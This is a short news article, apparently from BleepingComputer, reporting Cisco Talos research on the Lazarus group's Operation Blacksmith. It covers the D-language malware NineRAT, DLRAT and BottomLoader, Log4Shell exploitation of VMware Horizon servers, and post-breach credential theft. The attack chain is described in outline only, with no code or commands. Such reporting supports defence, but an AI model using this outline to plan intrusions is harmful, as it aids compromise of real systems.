The new malware are two remote access trojans named NineRAT and DLRAT and a malware downloader named BottomLoader.
The D programming language is rarely seen in cybercrime operations, so Lazarus probably chose it for new malware development to evade detection.
Operation Blacksmith represents a notable shift in tactics and tools used by Lazarus, serving as yet another demonstration of the threat group's ever-shifting tactics.
The first malware, NineRAT, is Lazarus' first of the two novel RATs.
It uses the Telegram API for command and control communication, including receiving commands and exfiltrating files from the breached computer.
NineRAT incorporates a dropper, which is also responsible for establishing persistence and launching the main binaries.
The second malware, DLRAT, is a trojan and downloader that Lazarus can use to introduce additional payloads on an infected system.
DLRAT's first activity on a device is to execute hard-coded commands to collect preliminary system information like OS details, network MAC address, etc.
Finally, Cisco's analysts discovered BottomLoader, a malware downloader that fetches and executes payloads from a hardcoded URL using PowerShell while also establishing persistence from them by modifying the Startup directory.
BottomLoader offers Lazarus the capacity to exfiltrate files from the infected system to the C2 server, providing some operational versatility.
The attacks observed by Cisco Talos involve leveraging Log4Shell, a critical remote code execution flaw in Log4j, which was discovered and fixed approximately two years ago yet remains a security problem.
The targets are publicly facing VMWare Horizon servers, which use a vulnerable version of the Log4j logging library, allowing the attackers to perform remote code execution.
Following the compromise, Lazarus sets up a proxy tool for persistent access on the breached server, runs reconnaissance commands, creates new admin accounts, and deploys credential-stealing tools like ProcDump and MimiKatz.
In the second phase of the attack, Lazarus deploys the NineRAT on the system, which supports a wide range of commands, as highlighted in the previous section.
North Korea's state hackers stole $3 billion in crypto since 2017.
UK and South Korea: Hackers use zero-day in supply-chain attack.
Microsoft: Lazarus hackers breach CyberLink in supply chain attack.
New macOS 'KandyKorn' malware targets cryptocurrency engineers.
Lazarus hackers breached dev repeatedly to deploy SIGNBT malware.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Mon, 11 Dec 2023 21:30:07 +0000